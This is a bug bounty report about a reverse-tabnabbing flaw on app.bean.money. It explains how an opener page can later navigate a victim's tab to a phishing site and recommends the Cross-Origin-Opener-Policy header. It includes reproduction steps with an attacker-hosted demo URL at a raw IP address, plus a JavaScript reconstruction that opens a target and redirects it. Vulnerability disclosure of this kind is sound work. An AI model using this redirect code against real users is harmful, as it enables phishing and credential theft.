Report ID
#33046
Report type
Websites and Applications
Has PoC?
Yes
Target
https://app.bean.money
Impacts
Redirecting users to malicious websites
Description
This report describes a vulnerability affecting your company that allows a malicious actor to manipulate navigation of a window running your application whenever that window was opened by a page the attacker controls. It can be exploited in numerous ways to deceive users, steal their credentials, disclose personal information, or distribute malware to their devices. The vulnerability arises because your web app does nothing to prevent a cross-origin opener from keeping a reference to the window in which it runs: a browser lets the page that opened a window navigate that window (set its location) even when the two are different origins, although it cannot read its contents. An attacker can therefore take control of the window after the user has been interacting with your legitimate application and send the user to a malicious web app, which the user is likely to accept as legitimate and trustworthy because it appears in the same tab.
Why is this your responsibility
Security is a shared responsibility, yet cross-site attacks like this one exploit the users' trust in your application. Just as with XSS, users rely on your web app being sound and free of exploitable weaknesses in order to use it at all. Since this attack is possible only because of the missing protection described above, it is your responsibility to ensure that it cannot happen.
Explanation
This vulnerability arises because your web application lacks safeguards against cross-origin opener manipulation, allowing it to be navigated by another application that opened it. Sending the Cross-Origin-Opener-Policy: same-origin HTTP header on every document response of your application mitigates the issue: the browser then loads your app in a new browsing context group, and the opener's reference to the window is severed (the handle reports closed and can no longer navigate it). If your application itself needs to keep references to popups it opens to other origins, same-origin-allow-popups also severs a cross-origin opener while preserving those references. This type of attack is more convincing than a conventional phishing link for the following reasons:
- The attacker's page opens your legitimate website in a new tab. Even a cautious user who checks the address bar at this point sees your authentic site.
- The user interacts with your domain as usual for a period of time.
- Later, without any action by the user, the tab reloads and shows a login form, something many web applications do when a session expires. Because nothing visibly breaks, users rarely re-check the address bar and are unlikely to realise that the tab now shows a different site; they rely on their trust in the integrity of your application.
- Once the user has entered their credentials, the attacker can navigate the tab back to your legitimate website, leaving the user unaware that they were targeted.
Proof of concept
Steps to Reproduce
- Visit the attacker's page, for example:
http://93.95.230.187/cross-site-window.html?target=https://app.bean.money/
- In this demo, click the image. Note that the attacker could also trigger the opening on hover or after a timeout, to the extent the browser's popup blocker permits window.open without a user gesture.
- The page opens the target in another tab and waits 10 seconds.
- The new tab is then redirected to another page, which could be a phishing or otherwise malicious site.
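The following browser-side code is an added reconstruction of the behaviour the demo page is described as having, not the original PoC and not code from the report; it is written against an injectable `win` object so the decision logic can be exercised under Node without a browser (in a browser, call `run(window, ...)` from a click handler). The phishing URL and the `run` wiring are assumptions.

```javascript
// Added example (not the original PoC): open the target, keep the handle,
// and after a delay navigate the opened window if the handle still works.

// Step 1: open the target from a user gesture and keep the returned handle.
// Browsers block window.open outside a user activation, so a hover or timer
// trigger only works where the popup blocker allows it.
function openTarget(win, targetUrl) {
  return win.open(targetUrl, "_blank");
}

// Step 2: after the delay, redirect the opened window if the opener's
// reference is still attached. A cross-origin opener may set `location`
// on the handle (navigation only; it cannot read the document). When the
// target sends Cross-Origin-Opener-Policy: same-origin, the browser moves
// it to a new browsing context group: the handle reports closed === true
// and the assignment below is never reached, so the check doubles as a
// way to verify that the header is in effect.
function redirectIfAttached(handle, phishUrl) {
  if (!handle || handle.closed) return false;  // severed or blocked: nothing to do
  handle.location = phishUrl;                   // cross-origin navigation of the popup
  return true;
}

// Wiring used by the demo: 10 s of normal use, then the redirect attempt.
// Resolves to true if the redirect happened, false if the handle was severed.
function run(win, targetUrl, phishUrl, delayMs = 10000) {
  const handle = openTarget(win, targetUrl);
  return new Promise((resolve) =>
    setTimeout(() => resolve(redirectIfAttached(handle, phishUrl)), delayMs));
}

module.exports = { openTarget, redirectIfAttached, run };
```

Against https://app.bean.money/ as reported, the handle stays attached and the tab is navigated; once the origin sends the header recommended above, `redirectIfAttached` returns false and the tab is left on the legitimate site.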